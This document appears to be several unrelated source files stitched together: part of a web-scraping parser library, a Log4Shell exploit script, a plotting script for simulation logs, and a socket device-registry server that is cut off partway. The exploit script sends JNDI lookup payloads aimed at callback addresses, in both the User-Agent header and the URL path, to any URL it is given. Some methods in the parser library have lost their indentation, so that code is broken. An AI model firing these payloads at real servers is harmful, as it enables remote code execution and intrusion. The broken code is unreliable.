            'yaml_safe_load': _lib.yaml_safe_load,
            'yaml_full_load': _lib.yaml_full_load,
        }
        # register the eight base-N codecs under their own function names
        for codec in (b16decode, b16encode, b32decode, b32encode, b64decode,
                      b64encode, b85decode, b85encode):
            self.loaders[codec.__name__] = text_codec(codec)
        super().__init__()
    @property
    def doc(self):
        return f'{self.__class__.__doc__}\n\nvalid param args: {list(self.loaders.keys())}\n\n{self.doc_url}\n\n{self.test_url}'
    def _parse(self, input_object, param, value=''):
        # unknown loader names act as identity (return_self)
        loader = self.loaders.get(param, return_self)
        if not value:
            return loader(input_object)
        try:
            # value is a JSON dict of extra kwargs; the loader call stays
            # inside the try so its own JSONDecodeError is returned, not raised
            kwargs = GlobalConfig.json_loads(value)
            return loader(input_object, **kwargs)
        except GlobalConfig.JSONDecodeError as err:
            return err
class TimeParser(BaseParser):
    """TimeParser. Parse different format of time. Sometimes time string need a preprocessing with regex.
    Since input object can not be list, _RECURSION_LIST will be True.
    To change time zone:
        uniparser.time.LOCAL_TIME_ZONE = +8
    :param input_object: str
    :type input_object: [str]
    :param param: encode / decode. encode: time string => timestamp; decode: timestamp => time string
    :type param: [str]
    :param value: standard strftime/strptime format
    :type value: [str]
    examples:
        ['2020-02-03 20:29:45', 'encode', ''] => 1580732985.0
        ['1580732985.1873155', 'decode', ''] => '2020-02-03 20:29:45'
        ['2020-02-03T20:29:45', 'encode', '%Y-%m-%dT%H:%M:%S'] => 1580732985.0
        ['1580732985.1873155', 'decode', '%b %d %Y %H:%M:%S'] => 'Feb 03 2020 20:29:45'
    WARNING: time.struct_time do not have timezone info, so %z is always the local timezone
    """
    name = 'time'
    match_int_float = re_compile(r'^-?\d+(\.\d+)?$')
    # EAST8 = +8, WEST8 = -8
    _OS_LOCAL_TIME_ZONE: int = -int(timezone / 3600)
    LOCAL_TIME_ZONE: int = _OS_LOCAL_TIME_ZONE
    @property
    def doc(self):
        return f'{self.__class__.__doc__}\n\n_OS_LOCAL_TIME_ZONE: {self._OS_LOCAL_TIME_ZONE}\nLOCAL_TIME_ZONE: {self.LOCAL_TIME_ZONE}\n\n{self.doc_url}\n\n{self.test_url}'
    def _parse(self, input_object, param, value):
        fmt = value or "%Y-%m-%d %H:%M:%S"
        # shift between the configured zone and the OS zone, in seconds
        offset_seconds = (self.LOCAL_TIME_ZONE -
                          self._OS_LOCAL_TIME_ZONE) * 3600
        if param == 'encode':
            # time string => timestamp
            if '%z' in fmt:
                logger.warning(
                    'TimeParser Warning: time.struct_time do not have timezone info, so %z is nonsense'
                )
            return mktime(strptime(input_object, fmt)) - offset_seconds
        if param == 'decode':
            # timestamp (possibly as a numeric string) => time string
            if isinstance(input_object,
                          str) and self.match_int_float.match(input_object):
                input_object = float(input_object)
            return strftime(fmt, localtime(input_object + offset_seconds))
        # unknown param: pass the input through untouched
        return input_object
class ContextParser(BaseParser):
    """Fetch a value from input_object by key; input_object is usually the shared context dict.
    :param input_object: will be ignore
    :param param: the key in context
    :type param: [str]
    :param value: default value if context not contains the key(param)
    :type value: [str]
    """
    name = 'context'
    @property
    def doc(self):
        return f'{self.__class__.__doc__}'
    def _parse(self, input_object, param, value):
        # falsy context or missing key -> default value
        if input_object and param in input_object:
            return input_object[param]
        return value
# str subclass that carries a pre-compiled expression object, used to avoid
# re-compiling jmespath / jsonpath / udf rule params on every parse.
class CompiledString(str):
    __slots__ = ('operator', 'code')
    # parser names whose params benefit from pre-compilation
    __support__ = ('jmespath', 'jsonpath', 'udf')
    def __new__(cls, string, mode=None, *args, **kwargs):
        # already compiled: return as-is to keep the attached .code/.operator
        if isinstance(string, cls):
            return string
        obj = str.__new__(cls, string, *args, **kwargs)
        obj = cls.compile(obj, string, mode)
        return obj
    @classmethod
    def compile(cls, obj, string, mode=None):
        if mode == 'jmespath':
            if string.startswith('JSON.'):
                # drop the 'JSON.' prefix entirely; jmespath has no '$' root
                string = string[5:]
            obj.code = _lib.jmespath_compile(string)
        elif mode == 'jsonpath':
            obj.code = _lib.jp_parse(string)
        elif mode == 'udf':
            # operator is `exec` (snippet defines parse()) or `eval`
            obj.operator = UDFParser.get_code_mode(string)
            # for higher performance, pre-compile the code
            obj.code = compile(string, string, obj.operator.__name__)
        return obj
class JsonSerializable(dict):
    """dict subclass with JSON (de)serialization helpers used by all rules."""
    __slots__ = ()
    def __init__(self, **kwargs):
        super().__init__()
        self.update(kwargs)
    def to_dict(self):
        # plain-dict copy of the stored items
        return dict(self.items())
    def dumps(self, *args, **kwargs):
        return GlobalConfig.json_dumps(self.to_dict(), *args, **kwargs)
    def to_json(self, *args, **kwargs):
        # alias of dumps
        return self.dumps(*args, **kwargs)
    @classmethod
    def loads(cls, json_string):
        # accept an existing instance, a JSON string, or a plain dict
        if isinstance(json_string, cls):
            return json_string
        if isinstance(json_string, str):
            return cls(**GlobalConfig.json_loads(json_string))
        if isinstance(json_string, dict):
            return cls(**json_string)
        raise TypeError('Only can be loaded from JSON / cls / dict.')
    @classmethod
    def from_json(cls, json_string):
        # alias of loads
        return cls.loads(json_string)
class ParseRule(JsonSerializable):
    """ParseRule should contain this params:
    1. a rule name, will be set as result key.
    2. chain_rules: a list of [[parser_name, param, value], ...], will be parse one by one.
    3. child_rules: a list of ParseRule instances, nested to save different values as named.
    4. context: a dict shared values by udf parse of the rules, only when udf value is null. May be shared from upstream CrawlerRule.
    Recursion parsing like a matryoshka doll.
    """
    __slots__ = ('context',)
    def __init__(self,
                 name: str,
                 chain_rules: List[List],
                 child_rules: List['ParseRule'] = None,
                 context: dict = None,
                 iter_parse_child: bool = False,
                 **kwargs):
        # pre-compile jmespath / jsonpath / udf params for faster re-use
        chain_rules = self.compile_codes(chain_rules or [])
        # ensure items of child_rules is ParseRule
        child_rules = [
            self.__class__(**parse_rule) for parse_rule in child_rules or []
        ]
        # context is stored as a slot attribute (not a dict key), so it is
        # excluded from the serialized form produced by JsonSerializable
        self.context = GlobalConfig.init_context(
        ) if context is None else context
        super().__init__(name=name,
                         chain_rules=chain_rules,
                         child_rules=child_rules,
                         **kwargs)
        # only persist the flag when set, keeping serialized rules compact
        if iter_parse_child:
            self['iter_parse_child'] = iter_parse_child
    @staticmethod
    def compile_rule(chain_rule):
        # chain_rule is [parser_name, param, value]; wrap `param` in a
        # CompiledString for parsers that support pre-compilation
        if isinstance(chain_rule[1], CompiledString):
            return chain_rule
        if chain_rule[0] in CompiledString.__support__:
            chain_rule[1] = CompiledString(chain_rule[1], mode=chain_rule[0])
        return chain_rule
    def compile_codes(self, chain_rules):
        return [self.compile_rule(chain_rule) for chain_rule in chain_rules]
class CrawlerRule(JsonSerializable):
    """A standard CrawlerRule contains:
    1. a rule name, will be set as result key.
    2. request_args for sending request.
    3. parse_rules: list of [ParseRule: , ...].
    4. regex: regex which can match a given url.
    5. context: a dict shared values by udf parse of the rules, only when udf value is null. May be shared to downstream ParseRule.
    6 **kwargs: some extra kwargs, sometimes contains encoding param.
    Rule format like:
        {
            "name": "crawler_rule",
            "request_args": {
                "method": "get",
                "url": "http://example.com",
                "headers": {
                    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
                }
            },
            "parse_rules": [{
                "name": "parse_rule",
                "chain_rules": [["css", "p", "$text"], ["python", "getitem", "[0]"]],
                "child_rules": [{
                    "name": "rule1",
                    "chain_rules": [["python", "getitem", "[:7]"]],
                    "child_rules": [
                        {
                            "name": "rule2",
                            "chain_rules": [["udf", "input_object[::-1]", ""]],
                            "child_rules": []
                        },
                        {
                            "name": "rule3",
                            "chain_rules": [["udf", "input_object[::-1]", ""]],
                            "child_rules": [{
                                "name": "rule4",
                                "chain_rules": [["udf", "input_object[::-1]", ""]],
                                "child_rules": []
                            }]
                        }
                    ]
                }]
            }],
            "regex": ""
        }
    Parse Result like:
        {'crawler_rule': {'parse_rule': {'rule1': {'rule2': 'od sihT', 'rule3': {'rule4': 'This do'}}}}}
    """
    __slots__ = ('context',)
    # default strategy name used by check_regex: 'match' or 'search'
    CHECK_STRATEGY = 'match'
    def __init__(self,
                 name: str,
                 request_args: Union[dict, str],
                 parse_rules: List[ParseRule] = None,
                 regex: str = None,
                 context: dict = None,
                 **kwargs):
        # normalize request_args (dict or str, per the annotation) into a dict
        _request_args: dict = ensure_request(request_args)
        # context is a slot attribute, so it is not part of the serialized rule
        self.context = GlobalConfig.init_context(
        ) if context is None else context
        # share this rule's context with every downstream ParseRule
        parse_rules = [
            ParseRule(context=self.context, **parse_rule)
            for parse_rule in parse_rules or []
        ]
        super().__init__(name=name,
                         parse_rules=parse_rules,
                         request_args=_request_args,
                         regex=regex or '',
                         **kwargs)
    def get_request(self, **request):
        # merge explicit kwargs over the rule's stored request_args
        if not request:
            return self['request_args']
        # deepcopy avoid headers pollution
        for k, v in deepcopy(self['request_args']).items():
            if k not in request:
                request[k] = v
        return request
    def add_parse_rule(self, rule: ParseRule, context: dict = None):
        rule = ParseRule(context=context or self.context, **rule)
        self['parse_rules'].append(rule)
    def pop_parse_rule(self, index, default=None):
        try:
            return self['parse_rules'].pop(index)
        except IndexError:
            return default
    def clear_parse_rules(self):
        self['parse_rules'].clear()
    def search(self, url):
        # an empty regex matches any url
        return not self['regex'] or re_compile(self['regex']).search(url)
    def match(self, url):
        # an empty regex matches any url
        return not self['regex'] or re_compile(self['regex']).match(url)
    def check_regex(self, url, strategy=''):
        # dispatch to self.search / self.match by strategy name
        return getattr(self, strategy or self.CHECK_STRATEGY)(url)
class HostRule(JsonSerializable):
    """Collection of CrawlerRules for a single host, keyed by rule name."""
    __slots__ = ()
    def __init__(self,
                 host: str,
                 crawler_rules: Dict[str, CrawlerRule] = None,
                 **kwargs):
        # normalize every stored rule into a CrawlerRule instance
        rules = {}
        for crawler_rule in (crawler_rules or {}).values():
            rules[crawler_rule['name']] = CrawlerRule(**crawler_rule)
        super().__init__(host=host, crawler_rules=rules, **kwargs)
    def findall(self, url, strategy=''):
        # find all the rules which matched the given URL, strategy could be: match, search, findall
        matched = []
        for rule in self['crawler_rules'].values():
            if rule.check_regex(url, strategy):
                matched.append(rule)
        return matched
    def find(self, url, strategy=''):
        # find only one rule which matched the given URL, strategy could be: match, search, findall
        rules = self.findall(url=url, strategy=strategy)
        if len(rules) > 1:
            raise ValueError(f'{url} matched more than 1 rule. {rules}')
        return rules[0] if rules else None
    def search(self, url):
        return self.find(url, 'search')
    def match(self, url):
        return self.find(url, 'match')
    def add_crawler_rule(self, rule: CrawlerRule):
        # accept serialized rules given as JSON strings
        if isinstance(rule, str) and not isinstance(rule, CrawlerRule):
            rule = CrawlerRule.loads(rule)
        self['crawler_rules'][rule['name']] = rule
        try:
            assert get_host(rule['request_args']['url']) == self[
                'host'], f'different host: {self["host"]} not match {rule["request_args"]["url"]}'
            assert self.match(rule['request_args']['url']) or self.search(
                rule['request_args']['url']
            ), f'regex {rule["regex"]} not match the given url: {rule["request_args"]["url"]}'
        except (ValueError, KeyError, AssertionError) as e:
            # roll back the insertion before re-raising
            self['crawler_rules'].pop(rule['name'], None)
            raise e
    def pop_crawler_rule(self, rule_name: str):
        return self['crawler_rules'].pop(rule_name, None)
class Uniparser(object):
"""Parsers collection.
"""
_RECURSION_CRAWL = True
    def __init__(self,
                 request_adapter: Union[AsyncRequestAdapter,
                                        SyncRequestAdapter] = None,
                 parse_callback: Callable = None):
        """
        :param request_adapter: request_adapter for downloading, defaults to None
        :type request_adapter: Union[AsyncRequestAdapter, SyncRequestAdapter], optional
        :param parse_callback: the callback function called while parsing result. Accept 3 args: (rule, result, context)
        :type parse_callback: Callable, optional
        """
        self._prepare_default_parsers()
        self._prepare_custom_parsers()
        self.request_adapter = request_adapter
        self.parse_callback = parse_callback
        # default frequency limiters; NullContext means "no rate limit"
        self._DEFAULT_FREQUENCY = NullContext()
        self._DEFAULT_ASYNC_FREQUENCY = NullContext()
        # host -> frequency controller, consulted by download()
        self._HOST_FREQUENCIES: dict = {}
    def _prepare_default_parsers(self):
        # Instantiate one parser per built-in scheme; short aliases share
        # the same instance (se/selectolax, json/jmespath, py/python).
        self.css = CSSParser()
        self.css1 = CSSSingleParser()
        self.xml = XMLParser()
        self.se = self.selectolax = SelectolaxParser()
        self.se1 = self.selectolax1 = SelectolaxSingleParser()
        self.jsonpath = JSONPathParser()
        self.objectpath = ObjectPathParser()
        self.json = self.jmespath = JMESPathParser()
        self.loader = LoaderParser()
        self.re = RegexParser()
        self.py = self.python = PythonParser()
        self.udf = UDFParser()
        self.time = TimeParser()
        self.context = ContextParser()
def _prepare_custom_parsers(self):
# handle the other sublclasses
for parser in BaseParser.__subclasses__():
if parser.name not in self.__dict__:
self.__dict__[parser.name] = parser()
@property
def parsers(self):
return [
parser for parser in self.__dict__.values()
if isinstance(parser, BaseParser)
]
@property
def parsers_all(self) -> Dict[str, BaseParser]:
return {
name: parser
for name, parser in self.__dict__.items()
if isinstance(parser, BaseParser)
}
@property
def parser_classes(self):
return BaseParser.__subclasses__()
def parse_chain(self,
input_object,
chain_rules: List,
context: dict = None):
context = GlobalConfig.init_context() if context is None else context
for parser_name, param, value in chain_rules:
parser: BaseParser = getattr(self, parser_name)
if parser is None:
msg = f'Unknown parser name: {parser_name}'
logger.error(msg)
raise UnknownParserNameError(msg)
if parser_name == 'context':
input_object = context
elif context and parser_name == 'udf' and not value:
value = context
input_object = parser.parse(input_object, param, value)
return input_object
    def parse_crawler_rule(self, input_object, rule: CrawlerRule, context=None):
        """Apply each ParseRule of `rule` to input_object.

        Returns {rule_name: {parse_rule_name: result, ...}}.
        """
        parse_rules = rule['parse_rules']
        parse_result: Dict[str, Any] = {}
        context = rule.context if context is None else context
        context.setdefault('request_args', rule['request_args'])
        # alias name for request_args in context
        context.setdefault('req', context['request_args'])
        # expose partial results to downstream rules while parsing
        context['parse_result'] = parse_result
        _input_object = input_object
        for parse_rule in parse_rules:
            temp_result = self.parse_parse_rule(_input_object, parse_rule,
                                                context).get(parse_rule['name'])
            # the special __object__ rule replaces the input for later rules
            if parse_rule['name'] == GlobalConfig.__object__:
                _input_object = temp_result
            parse_result[parse_rule['name']] = temp_result
        context.pop('parse_result', None)
        return {rule['name']: parse_result}
    def parse_parse_rule(self, input_object, rule: ParseRule, context=None):
        """Parse input_object with one ParseRule and, recursively, its child_rules.

        Returns {rule_name: result}.
        :raises InvalidSchemaError: when a __schema__ rule does not yield True
        """
        # if context, use context; else use rule.context
        context = rule.context if context is None else context
        input_object = self.parse_chain(input_object,
                                        rule['chain_rules'],
                                        context=context)
        if rule['name'] == GlobalConfig.__schema__ and input_object is not True:
            raise InvalidSchemaError(
                f'Schema check is not True: {repr(input_object)[:50]}')
        if rule['child_rules']:
            result: Dict[str, Any] = {rule['name']: {}}
            if rule.get('iter_parse_child', False):
                # iterate the chain result, applying child rules to each item
                result[rule['name']] = []
                for partial_input_object in input_object:
                    partial_result = {}
                    for sub_rule in rule['child_rules']:
                        partial_result[
                            sub_rule['name']] = self.parse_parse_rule(
                                partial_input_object, sub_rule,
                                context=context).get(sub_rule['name'])
                    result[rule['name']].append(partial_result)
            else:
                # apply every child rule to the same chain result
                for sub_rule in rule['child_rules']:
                    result[rule['name']][
                        sub_rule['name']] = self.parse_parse_rule(
                            input_object, sub_rule,
                            context=context).get(sub_rule['name'])
        else:
            result = {rule['name']: input_object}
        if self.parse_callback:
            # callback may transform / replace the result
            return self.parse_callback(rule, result, context)
        return result
    def parse(self,
              input_object,
              rule_object: Union[CrawlerRule, ParseRule],
              context=None):
        """Dispatch to parse_crawler_rule / parse_parse_rule by rule type.

        :raises TypeError: if rule_object is neither CrawlerRule nor ParseRule
        """
        context = rule_object.context if context is None else context
        if isinstance(rule_object, CrawlerRule):
            # a CrawlerRule may declare an input_callback preprocessing step
            input_object = InputCallbacks.callback(
                text=input_object,
                context=context,
                callback_name=rule_object.get('input_callback'))
            return self.parse_crawler_rule(input_object=input_object,
                                           rule=rule_object,
                                           context=context)
        elif isinstance(rule_object, ParseRule):
            return self.parse_parse_rule(input_object=input_object,
                                         rule=rule_object,
                                         context=context)
        else:
            raise TypeError(
                'rule_object type should be CrawlerRule or ParseRule.')
    async def aparse_crawler_rule(self,
                                  input_object,
                                  rule: CrawlerRule,
                                  context=None):
        """Async counterpart of parse_crawler_rule.

        Returns {rule_name: {parse_rule_name: result, ...}}.
        """
        parse_rules = rule['parse_rules']
        parse_result: Dict[str, Any] = {}
        context = rule.context if context is None else context
        context.setdefault('request_args', rule['request_args'])
        # alias name for request_args in context
        context.setdefault('req', context['request_args'])
        # expose partial results to downstream rules while parsing
        context['parse_result'] = parse_result
        _input_object = input_object
        for parse_rule in parse_rules:
            temp_result = (await self.aparse_parse_rule(
                _input_object, parse_rule, context)).get(parse_rule['name'])
            # the special __object__ rule replaces the input for later rules
            if parse_rule['name'] == GlobalConfig.__object__:
                _input_object = temp_result
            parse_result[parse_rule['name']] = temp_result
        context.pop('parse_result', None)
        return {rule['name']: parse_result}
    async def aparse_parse_rule(self,
                                input_object,
                                rule: ParseRule,
                                context=None):
        """Async counterpart of parse_parse_rule; the chain runs in a thread.

        :raises InvalidSchemaError: when a __schema__ rule does not yield True
        """
        # if context, use context; else use rule.context
        context = rule.context if context is None else context
        # run the (blocking) parse chain in a worker thread
        input_object = await to_thread(self.parse_chain, input_object,
                                       rule['chain_rules'], context)
        try:
            # the chain result may itself be awaitable; resolve it here
            input_object = await ensure_await_result(input_object)
        except GlobalConfig.SYSTEM_ERRORS:
            raise
        except Exception as error:
            # non-fatal errors are carried forward as the parse result
            input_object = error
        if rule['name'] == GlobalConfig.__schema__ and input_object is not True:
            raise InvalidSchemaError(
                f'Schema check is not True: {repr(input_object)[:50]}')
        if rule['child_rules']:
            result: Dict[str, Any] = {rule['name']: {}}
            if rule.get('iter_parse_child', False):
                # iterate the chain result, applying child rules to each item
                result[rule['name']] = []
                for partial_input_object in input_object:
                    partial_result = {}
                    for sub_rule in rule['child_rules']:
                        temp_result = await self.aparse_parse_rule(
                            partial_input_object, sub_rule, context=context)
                        partial_result[sub_rule['name']] = temp_result.get(
                            sub_rule['name'])
                    result[rule['name']].append(partial_result)
            else:
                # apply every child rule to the same chain result
                for sub_rule in rule['child_rules']:
                    temp_result = await self.aparse_parse_rule(input_object,
                                                               sub_rule,
                                                               context=context)
                    result[rule['name']][sub_rule['name']] = temp_result.get(
                        sub_rule['name'])
        else:
            result = {rule['name']: input_object}
        if self.parse_callback:
            if asyncio.iscoroutinefunction(self.parse_callback):
                coro = self.parse_callback(rule, result, context)
            else:
                # NOTE(review): get_event_loop() inside a coroutine is a
                # deprecated pattern on 3.10+; get_running_loop() is preferred
                coro = asyncio.get_event_loop().run_in_executor(
                    None, self.parse_callback, rule, result, context)
            return await coro
        return result
async def aparse(self,
input_object,
rule_object: Union[CrawlerRule, ParseRule],
context=None):
context = rule_object.context if context is None else context
if isinstance(rule_object, CrawlerRule):
input_object = await InputCallbacks.acallback(
text=input_object,
context=context,
callback_name=rule_object.get('input_callback'))
return await self.aparse_crawler_rule(input_object=input_object,
rule=rule_object,
context=context)
elif isinstance(rule_object, ParseRule):
return await self.aparse_parse_rule(input_object=input_object,
rule=rule_object,
context=context)
else:
raise TypeError(
'rule_object type should be CrawlerRule or ParseRule.')
def ensure_adapter(self, sync=True):
if self.request_adapter:
request_adapter = self.request_adapter
if sync and isinstance(request_adapter, SyncRequestAdapter) or (
not sync) and isinstance(request_adapter,
AsyncRequestAdapter):
return self.request_adapter
if sync:
self.request_adapter = get_available_sync_request()()
else:
self.request_adapter = get_available_async_request()()
return self.request_adapter
    def download(self,
                 crawler_rule: CrawlerRule = None,
                 request_adapter=None,
                 **request):
        """Synchronously perform the request described by ``crawler_rule``
        (or by raw ``**request`` kwargs when no rule is given).

        Returns ``(input_object, resp)``.  For non-http URLs no request is
        made: ``request_args`` itself is returned and ``resp`` is None.
        """
        request_adapter = request_adapter or self.ensure_adapter(sync=True)
        if not isinstance(request_adapter, SyncRequestAdapter):
            raise RuntimeError('bad request_adapter type')
        if isinstance(crawler_rule, CrawlerRule):
            request_args = crawler_rule.get_request(**request)
        else:
            request_args = request
        host = get_host(request_args['url'])
        if request_args['url'].startswith('http'):
            # throttle per host, falling back to the shared default limiter
            freq = self._HOST_FREQUENCIES.get(host, self._DEFAULT_FREQUENCY)
            with freq:
                with request_adapter as req:
                    input_object, resp = req.request(**request_args)
        else:
            # non-http request will skip the downloading process, request_args as input_object
            input_object, resp = request_args, None
        return input_object, resp
def crawl(self,
crawler_rule: CrawlerRule,
request_adapter=None,
context=None,
**request):
request_args = crawler_rule.get_request(**request)
input_object, resp = self.download(None, request_adapter,
**request_args)
if isinstance(resp, Exception):
return resp
if context is None:
context = crawler_rule.context
else:
for k, v in crawler_rule.context.items():
if k not in context:
context[k] = v
context['resp'] = resp
context['request_args'] = request_args
return self.parse(input_object, crawler_rule, context)
    async def adownload(self,
                        crawler_rule: CrawlerRule = None,
                        request_adapter=None,
                        **request):
        """Async counterpart of ``download``.

        Returns ``(input_object, resp)``; non-http URLs skip the network
        round-trip and return ``(request_args, None)``.
        """
        request_adapter = request_adapter or self.ensure_adapter(sync=False)
        if not isinstance(request_adapter, AsyncRequestAdapter):
            raise RuntimeError('bad request_adapter type')
        if isinstance(crawler_rule, CrawlerRule):
            request_args = crawler_rule.get_request(**request)
        else:
            request_args = request
        host = get_host(request_args['url'])
        if request_args['url'].startswith('http'):
            # throttle per host, falling back to the shared async default limiter
            freq = self._HOST_FREQUENCIES.get(host,
                                              self._DEFAULT_ASYNC_FREQUENCY)
            async with freq:
                async with request_adapter as req:
                    input_object, resp = await req.request(**request_args)
        else:
            # non-http request will skip the downloading process, request_args as text
            input_object, resp = request_args, None
        return input_object, resp
async def acrawl(self,
crawler_rule: CrawlerRule,
request_adapter=None,
context=None,
**request):
request_args = crawler_rule.get_request(**request)
input_object, resp = await self.adownload(None, request_adapter,
**request_args)
if isinstance(resp, Exception):
return resp
if context is None:
context = crawler_rule.context
else:
for k, v in crawler_rule.context.items():
if k not in context:
context[k] = v
context['resp'] = resp
context['request_args'] = request_args
return await self.aparse(input_object, crawler_rule, context)
    def set_frequency(self, host_or_url: str, n=0, interval=0):
        """Set the per-host limiter used by ``download`` to ``_lib.Frequency(n, interval)``."""
        host = get_host(host_or_url, host_or_url)
        self._HOST_FREQUENCIES[host] = _lib.Frequency(n, interval)
    def set_async_frequency(self, host_or_url: str, n=0, interval=0):
        """Set the per-host limiter used by ``adownload`` to ``_lib.AsyncFrequency(n, interval)``.

        NOTE(review): this writes into the same ``_HOST_FREQUENCIES`` dict as
        ``set_frequency``, so a sync and an async limit for the same host
        overwrite each other — confirm that is intended.
        """
        host = get_host(host_or_url, host_or_url)
        self._HOST_FREQUENCIES[host] = _lib.AsyncFrequency(n, interval)
    def pop_frequency(self, host_or_url: str, default=None):
        """Remove and return the limiter for the host, or ``default`` when none is set."""
        host = get_host(host_or_url, host_or_url)
        return self._HOST_FREQUENCIES.pop(host, default)
| ClericPy/uniparser | uniparser/parsers.py | parsers.py | py | 64,715 | python | en | code | 8 | github-code | 13 |
12377795623 | import requests
def make_requests(url):
    """Probe `url` for Log4Shell (CVE-2021-44228), one request per JNDI protocol.

    Each request carries the payload both in the User-Agent header and in the
    request path/query, pointing at distinct callback addresses so the source
    of a triggered lookup can be told apart.
    """
    for protocol in ('ldap', 'rmi', 'ldaps'):
        jndi_header = '${jndi:' + protocol + '://10.10.0.1:443/a}'
        target = url + "/${jndi:" + protocol + "://20.20.0.1:443/a}/?pwn=$\{jndi:" + protocol + "://30.30.0.1:443/a\}'"
        response = requests.get(target, headers={'User-Agent': jndi_header})
        print(response.text)
if __name__ == '__main__':
    # read the target URL from stdin, then fire the probes
    make_requests(input())
| Sekuloski/Log4j-python | main.py | main.py | py | 466 | python | en | code | 0 | github-code | 13 |
40710010990 | ### IMPORTS
import sys
import matplotlib.pyplot as plt
### MAIN
# One plot per log file given on the command line.
for filename in sys.argv[1:]:
    # FIX: the original opened without ever closing (leaked file handles)
    # and shadowed the builtin name 'file'; a with-block closes deterministically.
    with open(filename, "r") as log_file:
        lines = log_file.readlines()
    times = []
    mFlowRates = [0]  # seed so each flow sample pairs with the *previous* time step
    time = 0
    for line in lines:
        if "Time =" in line and "ExecutionTime" not in line:
            time = float(line.split()[2])  # current simulation time
        if "faceZone massFlowSurface_z1 massFlow" in line:
            mFlowRates.append(float(line.split()[4]))
            times.append(time)
    # Shift times so the first sample is at t=0 (guarding the empty case,
    # which made the original crash with an IndexError).
    if times:
        t0 = times[0]
        times = [t - t0 for t in times]
    del mFlowRates[-1]  # drop the trailing value to realign with 'times' after the seed
    plt.figure()
    plt.plot(times, mFlowRates)
    plt.xlabel("iteration")
    plt.ylabel("Mass flow rate")
    plt.grid()
    plt.show()
| zdhughes91/GeN-Foam-Restructure | Tutorials/toBeUpdated/testingMod/plotMassFlowRate.py | plotMassFlowRate.py | py | 846 | python | en | code | 0 | github-code | 13 |
27789230829 | from socket import socket, AF_INET, SOCK_STREAM
from uuid import getnode
from ast import literal_eval
import time
import sys
#Registers device onto the server using device's id and MAC address
def REGISTER(deviceID, MAC, IP, port):
    """Register a device with the server.

    Replies ACK(1, 1, ...) for a new registration, ACK(1, 2, ...) when the
    exact (deviceID, MAC) pair is already registered, or NACK(1, ...) when
    the ID or MAC collides with a *different* existing device.

    FIX: the original compared ``sorted()`` character lists, which treated
    anagram IDs/MACs (e.g. "AB12" vs "21BA") as equal; direct equality is
    the intended check.  The duplicated "register" code for the empty-table
    case is folded into the normal path.
    """
    print("Device attempting to register to server, input values:")
    print("DeviceID: ", deviceID, "MAC: ", MAC, "IP: ", IP, "Port: ", port)
    for index, entry in enumerate(deviceTable):
        storedID, storedMAC = entry[0], entry[1]
        if storedMAC == MAC:
            if storedID == deviceID:
                registerTime = entry[4]  # time the device was first registered
                mailCount = len(mailBox[index])  # pending messages for it
                print("Device is already registered", "\n")
                ACK(1, 2, deviceID, registerTime, mailCount)
            else:
                # same MAC registered under a different device ID
                print("Device is already registered with same MAC, different device ID", "\n")
                NACK(1, storedID, MAC)
            return
        if storedID == deviceID:
            # same device ID registered under a different MAC
            print("Device is already registered with same device ID, different MAC address", "\n")
            NACK(1, deviceID, storedMAC)
            return
    # No conflicts (this also covers an empty table): register the device.
    registerTime = time.time() - startTime  # elapsed time since server start
    deviceTable.append([deviceID, MAC, IP, port, registerTime])
    mailBox.append([])  # matching mailbox slot for the new device
    print("Device registered successfully", "\n")
    ACK(1, 1, deviceID, 0, 0)
#Deregisters device from server's stored registry
def DEREGISTER(deviceID, MAC):
    """Deregister a device.  Replies ACK(2, ...) on success, NACK(2, ...) otherwise.

    FIXES vs original: direct equality instead of the anagram-prone
    ``sorted()`` comparison; consistent deregister reply codes (one branch
    sent register-type codes); the matching mailbox slot is removed so
    mailBox stays index-aligned with deviceTable; and a NACK is always sent
    when nothing matches (the original fell off the end silently, leaving
    the client blocked on recv).
    """
    print("Device attempting to deregister, device ID: ", deviceID, " MAC: ", MAC)
    for index, entry in enumerate(deviceTable):
        storedID, storedMAC = entry[0], entry[1]
        if storedMAC == MAC:
            if storedID == deviceID:
                del deviceTable[index]
                del mailBox[index]  # keep mailBox aligned with deviceTable
                print("Device Deregistered, DeviceID: ", deviceID, " MAC: ", MAC, "\n")
                ACK(2, 0, deviceID, 0, 0)
            else:
                # MAC found but under a different device ID
                print("Device failed to deregister", "\n")
                NACK(2, storedID, MAC)
            return
        if storedID == deviceID:
            # ID found but under a different MAC
            print("Device failed to deregister", "\n")
            NACK(2, deviceID, storedMAC)
            return
    # Empty table or no matching entry at all.
    print("Device failed to deregister", "\n")
    NACK(2, deviceID, MAC)
#Stores mail between clients in the proxy network
def MSG(fromID, toID, message, time):
    """Store `message` in the destination device's mailbox.

    Replies ACK(3, ...) to the sender on success, NACK(3, ...) when `toID`
    is not registered.  (FIX: exact-match comparison replaces the original
    anagram-prone ``sorted()`` comparison.)
    """
    print("Server attempting to send a message from: ", fromID, " to: ", toID)
    for index, entry in enumerate(deviceTable):
        if entry[0] == toID:
            # mailbox entry shape: [message, relative time it was stored]
            mailBox[index].append([message, time])
            print("Message added by server to the mailbox successfully", "\n")
            ACK(3, 0, fromID, 0, 0)
            return
    print("Destination device ID was not found by server", "\n")
    NACK(3, fromID, 0)
#Retrieves information stored in the server for client devices
def QUERY(queryType, deviceID):
    """Answer a client query.

    queryType 1: send the (IP, port) of another registered device.
    queryType 2: send the device's own pending mail, then clear its mailbox
    after the client confirms receipt.

    FIXES: ``==`` instead of ``is`` on int literals ('is' only works via
    CPython small-int caching and warns on 3.8+); exact-match comparison
    instead of ``sorted()``.
    """
    if queryType == 1:
        print("Server attempting to query for info on device ID: ", deviceID)
        for entry in deviceTable:
            if entry[0] == deviceID:
                # reply: (status 0, IP, port) of the queried device
                deviceFound = str.encode(str((0, entry[2], entry[3])))
                print("Server successfully sent info on queried device", "\n")
                sock.send(deviceFound)
                return
        print("Server couldn't find the device being queried", "\n")
        NACK(4, deviceID, 0)
    if queryType == 2:
        print("Server attempting to query for deviceID: ", deviceID, " mail")
        for index, entry in enumerate(deviceTable):
            if entry[0] == deviceID:
                userMail = str.encode(str((0, mailBox[index])))
                print("Server sending mail to client")
                sock.send(userMail)
                sock.recv(1024)  # wait for client confirmation before clearing
                mailBox[index] = []
                print("Server successfully sent mail, deleting the sent mail from mailbox", "\n")
                return
        print("Server couldn't find the device being queried", "\n")
        NACK(4, deviceID, 0)
#Tells client that a operation was not successful
def NACK(code, deviceID, MAC):
    """Send a failure reply to the client.

    code: 1 = register, 2 = deregister, 3 = message, 4 = query.
    Register/deregister failures echo both the conflicting ID and MAC;
